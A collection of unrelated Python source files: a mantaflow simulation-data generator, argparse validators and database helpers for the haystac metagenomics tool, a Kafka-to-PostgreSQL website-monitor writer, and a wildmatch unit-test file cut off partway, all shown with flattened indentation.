# Repository: tum-pbs/VOLSIM
import sys, os, random, shutil, datetime
from manta import *
import numpy as np
sys.path.append(os.getcwd() + '/tensorflow/tools')
import paramhelpers as ph
import imageio
withGUI = False
modes = ["pos", "pos_s", "pos_n", "pos_sn"] # count: 4
modesWave = ["pos", "pos_n"] # count: 2
res = 128
outputFolder = "data/test_verbose"
# parse arguments
if len(sys.argv) == 4:
seed = int(sys.argv[2])
useWaves = sys.argv[3] == "Waves"
mode = modes[int(sys.argv[1])] if not useWaves else modesWave[int(sys.argv[1])]
mantaMsg("--------------------------------------------")
mantaMsg("| Mode: %s" % mode)
mantaMsg("| Seed: %i" % seed)
mantaMsg("| Use Waves: %s" % useWaves)
mantaMsg("--------------------------------------------")
else:
mode = modesWave[0]
seed = 0
useWaves = True
mantaMsg("Wrong parameters!")
exit(1)
# solver params
gs = vec3(res,res,res)
s = Solver(name='main', gridSize = gs, dim=3)
s.timestep = 1.0
# prepare output folders, rendering and log
if not useWaves:
basepath = "%s/shapes_%s/sim_%06d" % (outputFolder, mode, seed)
else:
basepath = "%s/waves_%s/sim_%06d" % (outputFolder, mode, seed)
if not os.path.exists(basepath + "/src"):
os.makedirs(basepath + "/src")
log = {}
log["Timestamp"] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
log["Solver"] = {"Source File": os.path.basename(__file__),
"Timestep": s.timestep, "Resolution": [gs.x, gs.y, gs.z], "Numpy Seed": seed}
if mode == "pos": var = "position"
elif mode == "pos_s": var = "position (smoothed)"
elif mode == "pos_n": var = "position (with noise)"
elif mode == "pos_sn": var = "position (smoothed, with noise)"
log["Variation"] = {"Parameter" : var}
renderpath = basepath + "/render/"
if not os.path.exists(renderpath):
os.makedirs(renderpath)
renderData = {"flagsMean" : []}
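# per-frame mean projections of the shape grid are collected here and written out as an mp4 after the main loop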
# prepare grids
shapeGrid = s.create(RealGrid)
noise = s.create(RealGrid)
flags = s.create(FlagGrid) # unused! dummy for gui
vel = s.create(VecGrid) # unused! dummy for gui
flags.fillGrid()
# setup shapes
numShapes = np.random.randint(1,6) if not useWaves else np.random.randint(1,4)
shapeTypes = np.random.rand(numShapes)
starts = np.zeros((numShapes, 3))
ends = np.zeros((numShapes, 3))
for i in range(numShapes):
while True:
starts[i] = res * np.random.rand(3)
ends[i] = res * np.random.rand(3)
# clamp away from boundary by maximum possible radius
dist = (0.25)*np.linalg.norm(ends[i]-starts[i])
starts[i] = np.maximum(starts[i], dist)
starts[i] = np.minimum(starts[i], res-dist)
ends[i] = np.maximum(ends[i], dist)
ends[i] = np.minimum(ends[i], res-dist)
if np.linalg.norm(ends[i]-starts[i]) > 0.3*res:
break
moveDirs = ends - starts
distances = np.linalg.norm(moveDirs, axis=1)
mantaMsg(str(numShapes))
mantaMsg(str(distances))
radii = np.zeros(numShapes)
for i in range(numShapes):
if not useWaves:
radii[i] = np.random.randint(0.1*distances[i], 0.2*distances[i])
shapeType = "Sphere" if shapeTypes[i] > 0.5 else "Box"
else:
radii[i] = np.random.randint(0.4*distances[i], 0.8*distances[i])
shapeType = "Wave"
log["Shape " + str(i)] = {"Type": shapeType, "Start": list(starts[i]), "End": list(ends[i]), "Radius": radii[i]}
if withGUI:
gui = Gui()
gui.show( True )
# helper function for mp4 export
def prepareRender(data, mode):
assert mode in ["mean", "slice"]
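    # "mean" averages the 3D field along the first axis, "slice" extracts the central slice;
    # the result is shifted/scaled to [0, 255], flipped vertically and cast to uint8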
if mode == "mean":
data = np.mean(data, axis=0)
else:
data = data[int(res/2)]
data = data - np.min(data)
data = data / np.max(data)
data = 255*data
data = np.flip(data, axis=0)
return data.astype(np.uint8)
#main loop
amounts = range(0,11)
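# each amount maps to an interpolation fraction amount / max(amounts) in [0, 1], moving every
# shape from its start towards its end position, so the loop writes 11 frames per simulation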
for amount in amounts:
mantaMsg('%s: %0.4f' % (mode, amount))
shapeGrid.setConst(0.)
for i in range(numShapes):
frac = float(amount) / float(max(amounts))
pos = vec3(starts[i,0], starts[i,1], starts[i,2]) + vec3(frac*moveDirs[i,0], frac*moveDirs[i,1], frac*moveDirs[i,2])
if not useWaves:
if shapeTypes[i] > 0.5:
shapeObj = s.create(Sphere, center=pos, radius=radii[i])
else:
shapeObj = s.create(Box, center=pos, size=vec3(0.85*radii[i], 0.85*radii[i], 0.85*radii[i]))
if mode == "pos_s" or mode == "pos_sn":
shapeObj.applyToGridSmooth(shapeGrid, value=1)
else:
shapeObj.applyToGrid(shapeGrid, value=1)
else:
applyWaveToGrid(shapeGrid, center=pos, radius=radii[i], waviness=0.2*shapeTypes[i])
if mode == "pos_n" or mode == "pos_sn":
if not useWaves:
noiseStrength = 0.25
else:
noiseStrength = 0.10
noiseSeed = random.randint(0, 999999999)
noiseMode = "normal"
createRandomField(noise=noise, strength=noiseStrength, bWidth=0, mode=noiseMode, seed=noiseSeed)
shapeGrid.add(noise)
log["Noise"] = {"Strength" : noiseStrength, "Seed" : noiseSeed, "Mode" : noiseMode}
# save data
flagsNP = np.zeros([res, res, res, 1])
copyGridToArrayReal( target=flagsNP, source=shapeGrid )
np.savez_compressed( "%s/flags_%06d_part%02d.npz" % (basepath, 0, amount), flagsNP.astype(np.float32) )
renderData["flagsMean"].append( prepareRender(flagsNP, "mean") )
s.step()
# save meta information
ph.writeParams(basepath + "/src/description.json", log)
shutil.copy(os.path.abspath(__file__), basepath + "/src/%s" % os.path.basename(__file__))
for key in renderData.keys():
if not useWaves:
outPath = "%sshapes_%s_sim_%06d.mp4" % (renderpath, mode, seed)
else:
outPath = "%swaves_%s_sim_%06d.mp4" % (renderpath, mode, seed)
#imageio.mimwrite(outPath, renderData[key], quality=6, fps=10, output_params=['-codec:v', 'copy', outPath])
    imageio.mimwrite(outPath, renderData[key], quality=8, fps=2, ffmpeg_log_level="error")
# Repository: antonisdim/haystack
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = "<NAME>, <NAME>"
__copyright__ = "Copyright 2020, University of Oxford"
__email__ = "<EMAIL>"
__license__ = "MIT"
import argparse
import hashlib
import os
import re
import sys
import pandas as pd
import yaml
REGEX_WHITELIST = r"[\w.-]+"
REGEX_BLACKLIST = r"[^\w.-]+"
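# REGEX_WHITELIST matches names built only from word characters, dots and dashes;
# REGEX_BLACKLIST matches any other character run and is used (e.g. by normalise_name)
# to replace invalid characters with underscores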
PE = "PE"
COLLAPSED = "COLLAPSED"
SE = "SE"
WARNING = "\x1b[33m"
FAIL = "\x1b[31m"
END = "\033[0m"
WARNING_DB = 0
WARNING_USER = 0
is_tty = sys.stdout.isatty()
class ValidationError(Exception):
pass
class ArgumentCustomFormatter(argparse.HelpFormatter):
"""
Custom formatter for argparse
"""
def _get_help_string(self, action):
message = action.help
if "%(default)" not in action.help:
if action.default is not argparse.SUPPRESS and action.default is not None:
defaulting_nargs = [argparse.OPTIONAL, argparse.ZERO_OR_MORE]
if action.option_strings or action.nargs in defaulting_nargs:
message += " (default: %(default)s)"
return message
class WritablePathType(object):
"""
Is this a writable path.
"""
def __call__(self, value):
from pathlib import Path
try:
path = Path(value).expanduser()
path.mkdir(parents=True, exist_ok=True)
return value
except Exception:
raise argparse.ArgumentTypeError(f"'{value}' is not a valid writable path")
class PositiveIntType(object):
"""
Is this a positive integer
"""
def __call__(self, value):
try:
if not int(value) > 0:
raise ValueError()
except ValueError:
raise argparse.ArgumentTypeError(f"'{value}' is not a valid positive integer")
return int(value)
class RangeType(object):
"""
Is this a valid instance of `_type` and within the range [lower, upper]
"""
def __init__(self, _type, lower, upper):
self.type = _type
self.lower = lower
self.upper = upper
def __call__(self, value):
try:
if not (self.lower <= self.type(value) <= self.upper):
raise ValueError()
except ValueError:
raise argparse.ArgumentTypeError(
f"'{value}' is not a valid {self.type.__name__} in the range ({self.lower}, {self.upper})"
)
return self.type(value)
class FloatRangeType(RangeType):
"""
Is this a float() within the given range
"""
def __init__(self, lower, upper):
super().__init__(float, lower, upper)
class IntRangeType(RangeType):
"""
Is this an int() within the given range
"""
def __init__(self, lower, upper):
super().__init__(int, lower, upper)
class BoolType(object):
"""
Is this a valid boolean
"""
def __call__(self, value):
if isinstance(value, bool):
return value
if value.lower() in ("yes", "true", "t", "y", "1"):
return True
elif value.lower() in ("no", "false", "f", "n", "0"):
return False
else:
raise argparse.ArgumentTypeError(f"'{value}' is not a valid boolean")
class JsonType(object):
"""
Is this a valid JSON string
"""
def __call__(self, value):
import json
try:
return json.loads(value)
except json.decoder.JSONDecodeError as error:
raise argparse.ArgumentTypeError(f"'{value}' is not a valid JSON string\n {error}")
class SpreadsheetFileType(object):
"""
Is it a valid user input file
"""
cols = None
data = None
def __call__(self, value):
if not os.path.exists(value):
            raise argparse.ArgumentTypeError(f"'{value}' does not exist")
if os.stat(value).st_size == 0:
raise argparse.ArgumentTypeError(f"'{value}' is empty")
try:
self.data = pd.read_table(
value,
sep="\t",
header=None,
index_col=False,
)
except Exception:
raise argparse.ArgumentTypeError(f"'{value}' unknown error parsing file")
if len(self.data.columns) != len(self.cols):
raise argparse.ArgumentTypeError(
f"'{value}' must have {len(self.cols)} columns and be tab delimited (cols={len(self.data.columns)})"
)
# find the row number of any empty cells
bad_rows = ", ".join([str(i + 1) for i in self.data.index[self.data.isnull().any(axis=1)].tolist()])
if bad_rows:
raise argparse.ArgumentTypeError(f"'{value}' contains missing data in line(s): {bad_rows}")
return value
class AccessionFileType(SpreadsheetFileType):
"""
Is this a valid accession input file.
"""
cols = ["species", "accession"]
def __call__(self, value):
super().__call__(value)
# check all accessions pass the regex pattern
idx = self.cols.index("accession")
species = self.cols.index("species")
bad_list_acc = "\n".join(
[
f"line {i + 1}: '{acc}'"
for i, acc in enumerate(self.data[idx].tolist())
if re.match(REGEX_BLACKLIST, acc) is not None
]
)
bad_list_species = "\n".join(
[
f"line {i + 1}: '{tax}'"
for i, tax in enumerate(self.data[species].tolist())
if re.match(REGEX_BLACKLIST, tax) is not None
]
)
if bad_list_acc or bad_list_species:
bad_list = bad_list_acc + "\n" + bad_list_species
raise argparse.ArgumentTypeError(
f"'{value}' these accession codes or taxon names contain invalid characters:\n{bad_list}"
)
return value
class SequenceFileType(AccessionFileType):
"""
Is this a valid sequence input file.
"""
cols = ["species", "accession", "path"]
def __call__(self, value):
super().__call__(value)
# find any files that don't exist or are empty
idx = self.cols.index("path")
bad_files = "\n".join(
[
f"line {i + 1}: '{file}'"
for i, file in enumerate(self.data[idx].tolist())
if not os.path.exists(file) or os.stat(file).st_size == 0
]
)
if bad_files:
raise argparse.ArgumentTypeError(f"'{value}' these sequence files do not exist or are empty:\n{bad_files}")
return value
class SraAccessionType(object):
"""
Is this a valid SRA accession
"""
def __call__(self, value):
# import these locally to avoid cyclic import issues
from haystac.workflow.scripts.entrez_utils import entrez_esearch, entrez_efetch
try:
# query the SRA to see if this a valid accession
_, _, id_list = entrez_esearch("sra", f"{value}[Accession]")
etree = entrez_efetch("sra", id_list)
except Exception:
raise argparse.ArgumentTypeError(f"Invalid SRA accession '{value}'")
run_code = etree.find(".//RUN").attrib["accession"]
if len(id_list) > 1 or value != run_code:
raise argparse.ArgumentTypeError(
f"The SRA accession you have provided {value} does not refer to a sequencing run. "
f"Please visit https://www.ncbi.nlm.nih.gov/sra/ and chose a valid "
f"sequencing run accession for the SRA accession {value}."
)
try:
# now get the library layout
layout = etree.find(".//LIBRARY_LAYOUT/*").tag.lower()
except Exception:
raise argparse.ArgumentTypeError(f"Unable to resolve the library layout for SRA accession '{value}'")
return value, layout
class NuccoreQueryType(object):
"""
Is this a valid nuccore query
"""
def __call__(self, value):
# import these locally to avoid cyclic import issues
from haystac.workflow.scripts.entrez_utils import entrez_esearch
# check if the user has given us a file instead of a string
if os.path.isfile(value):
query = open(value).read().strip()
if not query:
raise argparse.ArgumentTypeError(f"The query file '{value}' is empty.")
else:
query = value
try:
# query nuccore to see if this a valid query
_, _, id_list = entrez_esearch("nuccore", f"{query}")
except Exception:
raise argparse.ArgumentTypeError(f"Invalid NCBI query '{query}'")
# if the query returns no result set raise error
if len(id_list) == 0:
raise argparse.ArgumentTypeError(f"No results in NCBI nucleotide for query '{query}'")
return value
class CheckExistingConfig(object):
"""
Checks the details of an existing yaml file against cli params or another yaml file
"""
def __init__(self, filename, params):
# check if second argument is a dict or a yaml file
if isinstance(params, dict):
params_config = params
elif os.path.isfile(params):
with open(params, "r") as fin_params:
params_config = yaml.safe_load(fin_params)
# check if a config already exists
if not os.path.isfile(filename):
pass
else:
# open the config file
with open(filename, "r") as fin:
existing_config = yaml.safe_load(fin)
if not isinstance(params, dict):
important_args = ["cache"]
else:
important_args = [
"cache",
"api_key",
"mismatch_probability",
"bowtie2_scaling",
"query",
"query_file",
"accessions_file",
"sequences_file",
"refseq_rep",
# "force_accessions",
# "exclude_accessions",
# "resolve_accessions",
"rank",
"mtDNA",
"aDNA",
"seed",
"fastq",
"fastq_r1",
"fastq_r2",
"sra",
"collapse",
"trim_adapters",
"sample",
"min_prob",
"query_file_md5",
"accessions_md5",
"sequences_md5",
]
for arg in important_args:
# check if all the important params match
if arg in existing_config.keys() and arg in params_config.keys():
if existing_config[arg] != params_config[arg]:
print_error(
f"You are trying to set a value for parameter {arg} on top of an already existing one "
f"(old: {existing_config[arg]}, new: {params_config[arg]}). "
f"Please either revert to the original parameter you used or create a "
f"new output directory."
)
class FastqFile(object):
"""
Is it a valid user input fastq file
"""
def __call__(self, value):
if not os.path.exists(value):
            raise argparse.ArgumentTypeError(f"'{value}' does not exist")
if os.stat(value).st_size == 0:
raise argparse.ArgumentTypeError(f"'{value}' is empty")
if ".gz" not in value:
with open(value, "r") as fin:
first_line = fin.readline()
else:
import gzip
with gzip.open(value, "rt") as fin:
first_line = fin.readline()
if first_line[0] != "@":
raise argparse.ArgumentTypeError(f"'{value}' is not a valid fastq file.")
return value
class BatchType(object):
"""
Is this a valid smk batch string
"""
def __call__(self, value):
try:
rulename, batch, batches = (
value.split("=")[0],
int(value.split("=")[1].split("/")[0]),
int(value.split("=")[1].split("/")[1]),
)
return rulename, batch, batches
        except (IndexError, ValueError) as error:
raise argparse.ArgumentTypeError(f"'{value}' is not a valid snakemake batch string\n {error}")
def get_total_paths(
checkpoints,
config,
):
"""
Get all the individual fasta file paths for the taxa in our database.
"""
sequences_df = pd.DataFrame()
if config["query"]:
pick_sequences = checkpoints.entrez_pick_sequences.get()
sequences_df = pd.read_csv(pick_sequences.output[0], sep="\t")
assert len(sequences_df) > 0, f"The entrez pick sequences file is empty {pick_sequences.output[0]}"
if config["refseq_rep"]:
sources = []
# refseq rep prok
if config["refseq_rep"] == "prokaryote_rep":
refseq_rep_prok = checkpoints.entrez_refseq_rep_prok_accessions.get()
refseq_genomes = pd.read_csv(refseq_rep_prok.output.refseq_genomes, sep="\t")
genbank_genomes = pd.read_csv(refseq_rep_prok.output.genbank_genomes, sep="\t")
assemblies = pd.read_csv(refseq_rep_prok.output.assemblies, sep="\t")
refseq_plasmids = pd.read_csv(refseq_rep_prok.output.refseq_plasmids, sep="\t")
genbank_plasmids = pd.read_csv(refseq_rep_prok.output.genbank_plasmids, sep="\t")
if not config["force_accessions"]:
invalid_assemblies = checkpoints.entrez_invalid_assemblies.get()
invalid_assembly_sequences = pd.read_csv(invalid_assemblies.output[0], sep="\t")
assemblies = assemblies[
~assemblies["AccessionVersion"].isin(invalid_assembly_sequences["AccessionVersion"])
]
sources = [
refseq_genomes,
genbank_genomes,
assemblies,
refseq_plasmids,
genbank_plasmids,
]
# refseq viruses
elif config["refseq_rep"] == "viruses":
refseq_viruses = checkpoints.entrez_refseq_viruses_accessions.get()
refseq_viral_genomes = pd.read_csv(refseq_viruses.output.refseq_viruses, sep="\t")
sources = [refseq_viral_genomes]
# refseq eukaryotes
elif config["refseq_rep"] == "eukaryotes":
refseq_eukaryotes = checkpoints.entrez_refseq_eukaryotes_accessions.get()
refseq_euk_genomes = pd.read_csv(refseq_eukaryotes.output.refseq_euk, sep="\t")
sources = [refseq_euk_genomes]
if config["query"]:
sources.append(sequences_df)
sequences_df = pd.concat(sources)
if config["sequences"] or config["accessions"]:
check_unique_taxa_in_custom_inputs(config["accessions"], config["sequences"])
if config["sequences"]:
custom_fasta_paths = pd.read_csv(
config["sequences"],
sep="\t",
header=None,
names=["species", "AccessionVersion", "path"],
)
custom_fasta_paths = check_unique_taxa_accs(custom_fasta_paths, config, config["sequences"], "user_file")
custom_seqs = custom_fasta_paths[["species", "AccessionVersion"]].copy()
custom_seqs["AccessionVersion"] = "custom_seq-" + custom_seqs["AccessionVersion"].astype(str)
sequences_df = sequences_df.append(custom_seqs)
if config["accessions"]:
custom_accessions = pd.read_csv(
config["accessions"],
sep="\t",
header=None,
names=["species", "AccessionVersion"],
)
custom_accessions = check_unique_taxa_accs(custom_accessions, config, config["accessions"], "user_file")
sequences_df = sequences_df.append(custom_accessions)
if config["genera"]:
sequences_df = sequences_df[sequences_df["species"].str.contains("|".join(config["genera"]))]
if config["exclude_accessions"]:
sequences_df = sequences_df[~sequences_df["AccessionVersion"].isin(config["exclude_accessions"])]
# check that db accessions are unique
sequences_df = check_unique_taxa_accs(sequences_df, config, "", "db")
inputs = []
for key, seq in sequences_df.iterrows():
orgname, accession = (
normalise_name(seq["species"]),
seq["AccessionVersion"],
)
inputs.append((orgname, accession))
return inputs
def normalise_name(taxon):
"""remove unnecessary characters from a taxon name string."""
return re.sub(REGEX_BLACKLIST, "_", taxon)
def check_unique_taxa_in_custom_inputs(accessions, sequences):
"""Checks that custom input files have only one entry per taxon"""
if accessions != "" and sequences != "":
custom_fasta_paths = pd.read_csv(sequences, sep="\t", header=None, names=["species", "accession", "path"])
custom_accessions = pd.read_csv(accessions, sep="\t", header=None, names=["species", "accession"])
# check if any taxa in common
taxon_acc = custom_accessions["species"].tolist()
taxon_seq = custom_fasta_paths["species"].tolist()
if bool(set(taxon_acc) & set(taxon_seq)):
print_error(
"You have provided the same taxon both in your custom sequences "
"file and your custom accessions file. Please pick and keep ONLY "
"one entry from both of these files. You can only have 1 sequence "
"per chosen taxon in your database."
)
# check if any accessions in common
accession_acc = custom_accessions["accession"].tolist()
accession_seq = custom_fasta_paths["accession"].tolist()
if bool(set(accession_acc) & set(accession_seq)):
print_error(
"You have provided the same accession both in your custom sequences "
"file and your custom accessions file. Please pick and keep ONLY "
"one entry from both of these files, or change the accession entry "
"appropriately in your custom sequences file. You can only have 1 accession name "
"per chosen taxon in your database."
)
def check_unique_taxa_accs(df, config, user_input, to_check):
"""Checks that there are only unique inputs for taxa and accessions"""
# if we are checking the user files
if to_check == "user_file":
# if duplicate accession in user file raise error
if df["AccessionVersion"].duplicated().any():
dup_acc = [i for i in df[df["AccessionVersion"].duplicated()]["AccessionVersion"].to_list()]
message = (
f"{user_input} contains multiple taxa for {', '.join(dup_acc)}. "
f"Please remove/fix all duplicates. Picking automatically a taxon/accession pair in "
f"this case is not possible."
)
print_error(message)
# if duplicate species in user file either raise error, or --resolve-accessions
elif df["species"].duplicated().any():
dup_taxa = [i for i in df[df["species"].duplicated()]["species"].to_list()]
message = f"{user_input} contains multiple sequences for {', '.join(dup_taxa)}. "
if not config["resolve_accessions"]:
message += (
"Either remove all duplicates, or set the `--resolve-accessions` flag to automatically choose one. "
"It is the first accession that will be chosen."
)
print_error(message)
else:
# global WARNING_USER
for idx, val in df[df["species"].duplicated(keep="first")].iterrows():
message += f"Accession {val['AccessionVersion']} for {val['species']} was omitted."
# if WARNING_USER == 0:
print_warning(message)
# WARNING_USER += 1
df = df[~df["species"].duplicated(keep="first")]
return df
# if all good return df as is
else:
return df
# if we are checking the database in total
elif to_check == "db":
# if duplicate accessions in db either raise error, or --resolve-accessions
if df["AccessionVersion"].duplicated().any():
dup_acc = [i for i in df[df["AccessionVersion"].duplicated()]["AccessionVersion"].to_list()]
dup_tax = [i for i in df[df["AccessionVersion"].duplicated(keep=False)]["species"].to_list()]
message = (
f"Accession {', '.join(dup_acc)} appears multiple times in the database "
f"with different taxa names ({', '.join(dup_tax)}). "
)
if not config["resolve_accessions"]:
message += (
f"Please remove/fix all duplicate accessions if possible. "
f"If multiple taxa have the same accession, "
f"that is possibly due to a recent change in NCBI's taxonomy, and it is strongly "
f"advised you check the latest information for these accessions. "
f"Either specify unique pairs of taxa and accessions using the `--accessions-file` or "
f"`--sequences-file` flags, or set the `--resolve-accessions` flag to automatically "
f"choose the first one. "
)
print_error(message)
else:
# global WARNING_DB
for idx, val in df[df["AccessionVersion"].duplicated(keep="first")].iterrows():
message += (
f"{val['species']} has been excluded. It is strongly advised to "
f"check the latest taxonomy info on NCBI."
)
# if WARNING_DB == 0:
print_warning(message)
# WARNING_DB += 1
df = df[~df["AccessionVersion"].duplicated(keep="first")]
return df
        # if all good return df as is
else:
return df
def get_final_db_paths(checkpoints, config):
"""Get all the taxon/acc pairs for the taxa in our database."""
db_sequences = checkpoints.entrez_db_list.get()
sequences_df = pd.read_csv(db_sequences.output[0], sep="\t", names=["species", "AccessionVersion"])
if config["genera"]:
sequences_df = sequences_df[sequences_df["species"].str.contains("|".join(config["genera"]))]
assert len(sequences_df) > 0, (
f"The db file containing the taxon/accession pairs is empty {db_sequences.output[0]}. "
f"Please rebuild the database."
)
inputs = []
for key, seq in sequences_df.iterrows():
orgname, accession = (
normalise_name(seq["species"]),
seq["AccessionVersion"],
)
inputs.append((orgname, accession))
return inputs
def chunker(seq, size):
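    """Yield successive slices of `seq`, each containing at most `size` items."""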
return (seq[pos : pos + size] for pos in range(0, len(seq), size))
def md5(filename):
hash_md5 = hashlib.md5()
# open file and get the checksum
with open(filename, "rb") as f:
# read it in chunks in case the file is big
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def print_error(message):
"""Function to print errors and exit"""
message = f"haystac: error: {message}"
print(f"{FAIL}{message}{END}" if is_tty else message, file=sys.stderr)
exit(1)
def print_warning(message):
"""Function to print warnings"""
message = f"WARNING: {message}"
print(f"{WARNING}{message}{END}" if is_tty else message, file=sys.stderr)
def get_smk_config():
"""Function to read the smk config and return a dictionary"""
try:
with open(".snakemake/config.yaml") as fin:
config = yaml.safe_load(fin)
except FileNotFoundError:
config = {}
return config
# Repository: yujungcheng/website-monitor, file: run_writer.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import time
import json
import daemon
import os
from datetime import datetime
from argparse import ArgumentParser
from common.utils import *
from common.kafka import Kafka
from common.database import PostgreSQL
from pykafka.exceptions import SocketDisconnectedError, LeaderNotAvailable
def main(args, log):
log.info(f'Writer start.')
websites = dict()
config_file = './config.ini' # default config file name
db = None
kf = None
try:
if args.config != None:
config_file = args.config
log.info(f'configure file: {config_file}')
db_cfg = get_config(config_file, 'postgre')
for key in ('host', 'port', 'dbname', 'user', 'password'):
if key not in db_cfg:
                raise Exception(f'database config missing {key}.')
db = PostgreSQL(db_cfg['host'],
db_cfg['port'],
db_cfg['dbname'],
db_cfg['user'],
db_cfg['password'],
log=log)
if db.connect() != True: # set connection
log.error("unable to connect database.")
raise Exception("error to set kafka client.")
db.initialise_database() # create tables if not exist
# get all websites from database
rows = db.get_website()
for row in rows:
name = row[0]
url = row[1]
websites[name] = url
log.info(f'websites in database: {websites}')
# read kafka config
kf_cfg = get_config(config_file, 'kafka')
for key in ('host', 'port', 'cafile', 'certfile', 'keyfile', 'topic'):
if key not in kf_cfg:
                raise Exception(f'kafka config missing {key}.')
kf = Kafka(kf_cfg['host'],
kf_cfg['port'],
kf_cfg['cafile'],
kf_cfg['certfile'],
kf_cfg['keyfile'],
log)
if kf.set_client() == False: # set kafka client
raise Exception("error to set kafka client.")
topic_name = kf_cfg['topic']
topic = kf.get_topic(topic_name)
if topic == False:
raise Exception("error to get kafka topic.")
# get topic offset from database.
row = db.get_topic_offset(topic_name)
if row == False:
log.info(f'add topic to database.')
now = datetime.now()
created_time = now.strftime("%d-%m-%Y %H:%M:%S")
db.add_topic(topic_name, created_time)
db_offset = 0
else:
log.info(f'topic offset in database is {row}.')
db_offset = int(row[0])
        # get kafka topic consumer
consumer_group_name = 'writer'
log.info(f'get simple consumer, group={consumer_group_name}')
consumer = topic.get_simple_consumer(
consumer_group=consumer_group_name,
consumer_timeout_ms=2000)
log.info(f'start consuming messages.')
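        # consume up to 100 messages per iteration, then bulk-insert any new results and
        # persist the advanced topic offset via db.add_check_results()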
while True:
results = [] # bulk results to store into database
for i in range(0, 100):
try:
message = consumer.consume()
if message == None:
break
except (SocketDisconnectedError) as e:
# handling connection loss
                log.warning(f'consumer socket disconnected: {e}')
time.sleep(1)
consumer = topic.get_simple_consumer(
consumer_group=consumer_group_name,
consumer_timeout_ms=2000)
break
except Exception as e:
                log.warning(f'consumer exception occurred: {e}')
break
# processing message
log.debug(f'consuming message, offset={message.offset}')
result = json.loads(message.value.decode('utf-8'))
name = result['name']
url = result['url']
# append new offset result to bulk result when offset value
# in database is less than offset value in kafka topic
if db_offset < message.offset:
if name not in websites: # add new website to database
now = datetime.now()
created_time = now.strftime("%d-%m-%Y %H:%M:%S")
log.info(f'add new website {name}, {url}')
db.add_website(created_time, name, url)
websites[name] = url
created_at = result['created_at']
status_code = result['status_code']
response_time = result['response_time']
content_check = result['content_check']
values = (created_at, name, status_code,
response_time, content_check)
results.append(values)
# write results to database
if results != []:
result_count = len(results)
log.debug(f'write {result_count} new results to database.')
db_offset += result_count
db.add_check_results(results, topic_name, db_offset)
except Exception as e:
log.error(e)
except KeyboardInterrupt:
log.info("stop running writer.")
finally:
if db != None:
db.disconnect()
if __name__ == "__main__":
name = 'writer'
parser = ArgumentParser(description=f'Website monitor - {name}')
parser.add_argument('--daemon', action='store_true', help='daemon mode')
parser.add_argument('--config', help='config file path')
parser.add_argument('--debug', action='store_true', help='enable debug')
parser.add_argument('--filelog', action='store_true', help='log to file')
args = parser.parse_args()
if args.debug:
if args.filelog:
log = get_log(name=name, level=logging.DEBUG, filelog=True)
else:
log = get_log(name=name, level=logging.DEBUG)
else:
if args.filelog:
log = get_log(name=name, filelog=True)
else:
log = get_log(name=name)
    if args.daemon:  # run in daemon mode
with daemon.DaemonContext(working_directory=os.getcwd()):
main(args, log)
else:
main(args, log)
# -*- coding: utf8 -*-
u"""
Unit-test for the wildmatch module
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import pathmatch.wildmatch as wildmatch
from pathmatch.helpers import generate_tests
# TODO: convert all tests to parametrized generated tests
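# generate_tests presumably turns each (pattern, text, expected) tuple below into its own
# parametrised test method that dispatches to the match_wild_star() helper defined on the class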
@generate_tests(
match_wild_star=[
# Basic wildmatch features
# Literal match
(u'foo', u'foo', True),
(u'foo', u'bar', False),
(u'', u'', True),
# Quantifiers
(u'???', u'foo', True),
(u'??', u'foo', False),
(u'*', u'foo', True),
(u'f*', u'foo', True),
(u'*f', u'foo', False),
(u'*foo*', u'foo', True),
(u'*ob*a*r*', u'foobar', True),
(u'*ab', u'aaaaaaabababab', True),
(u'foo', u'foo', True),
(u'foo', u'bar', False),
(u'', u'', True),
]
)
class TestWildmatchFunctions(unittest.TestCase):
u"""
TestCase for the wildmatch functions
"""
def parse_bracket_expression(self, pattern, expected_matching, expected_items=()):
# print(repr(pattern))
if expected_matching is None:
with self.assertRaises(Exception):
wildmatch._parse_bracket_expression(pattern)
else:
be, be_len = wildmatch._parse_bracket_expression(pattern)
actual_matching, actual_items = wildmatch._read_bracket_expression(be)
self.assertEqual(expected_matching, actual_matching)
self.assertEqual(tuple(expected_items), tuple(actual_items))
def match_wild_star(self, pattern, text, result):
if result is None: # Expect error
# msg = u'Expect match({}, {}) to raise an error'.format(repr(pattern), repr(text))
# print(msg)
with self.assertRaises(Exception):
wildmatch.translate(pattern, wild_star=True)
else:
# msg = u'Expect match({}, {}) to be {}'.format(repr(pattern), repr(text), repr(result))
# print(msg)
regex = wildmatch.translate(pattern, wild_star=True)
# print(repr(regex.pattern))
self.assertEqual(result, regex.match(text) is not None)
def match(self, pattern, text, result):
msg = u'Expect match({}, {}) to be {}'.format(repr(pattern), repr(text), repr(result))
self.assertEqual(result, wildmatch.match(pattern, text, wild_star=False, path_name=False), msg)
def match_case_fold(self, pattern, text, result):
msg = u'Expect match({}, {}) to be {}'.format(repr(pattern), repr(text), repr(result))
self.assertEqual(result, wildmatch.match(pattern, text, case_fold=True), msg)
def translate(self, pattern, regex_pattern):
translated = wildmatch.translate(pattern)
self.assertEqual(translated.pattern, regex_pattern)
def test_match(self):
# Basic wildmatch features
# Literal match
self.match_wild_star(u'foo', u'foo', True)
self.match_wild_star(u'foo', u'bar', False)
self.match_wild_star(u'', u'', True)
# Quantifiers
self.match_wild_star(u'???', u'foo', True)
self.match_wild_star(u'??', u'foo', False)
self.match_wild_star(u'*', u'foo', True)
self.match_wild_star(u'f*', u'foo', True)
self.match_wild_star(u'*f', u'foo', False)
self.match_wild_star(u'*foo*', u'foo', True)
self.match_wild_star(u'*ob*a*r*', u'foobar', True)
self.match_wild_star(u'*ab', u'aaaaaaabababab', True)
# Escaped literal
self.match_wild_star(u'foo\\*', u'foo*', True)
self.match_wild_star(u'foo\\*bar', u'foobar', False)
self.match_wild_star(u'f\\\\oo', u'f\\oo', True)
# Bracket expression
self.match_wild_star(u'*[al]?', u'ball', True)
self.match_wild_star(u'[ten]', u'ten', False)
# self.match_wild_star(u'**[!te]', u'ten', False) # ** interpreted as wildstar ?
# self.match_wild_star(u'**[!ten]', u'ten', False) # ** interpreted as wildstar ?
# Negative character class
self.match_wild_star(u't[a-g]n', u'ten', True)
self.match_wild_star(u't[!a-g]n', u'ten', False)
self.match_wild_star(u't[!a-g]n', u'ton', True)
self.match_wild_star(u't[^a-g]n', u'ton', True)
# Bracket expression meta-characters
